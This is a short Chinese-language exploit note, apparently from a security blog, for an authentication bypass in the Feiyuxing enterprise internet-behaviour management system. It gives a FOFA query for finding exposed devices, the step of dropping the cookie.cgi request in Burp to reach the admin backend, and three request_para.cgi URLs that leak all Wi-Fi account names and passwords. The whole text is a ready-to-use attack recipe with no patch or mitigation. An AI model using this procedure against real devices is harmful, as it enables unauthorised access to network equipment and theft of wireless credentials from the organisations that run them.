# 飛魚星 企業級智能上網行為管理系統 權限繞過信息洩露漏洞
==FOFA==
title="飞鱼星企业级智能上网行为管理系统"
==漏洞利用==
訪問主頁使用Burp抓包;
http://xxx.xxx.xxx.xxx/home/index.html
使用Burp Dorp cookie.cgi請求包
成功越權後台,其中還存在敏感信息洩露
/request_para.cgi?parameter=wifi_info #獲取ALL WIFI賬號密碼 /request_para.cgi?parameter=wifi_get_5g_host #獲取5GWIFI賬號密碼 /request_para.cgi?parameter=wifi_get_2g_host #獲取2GWIFI賬號密碼
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容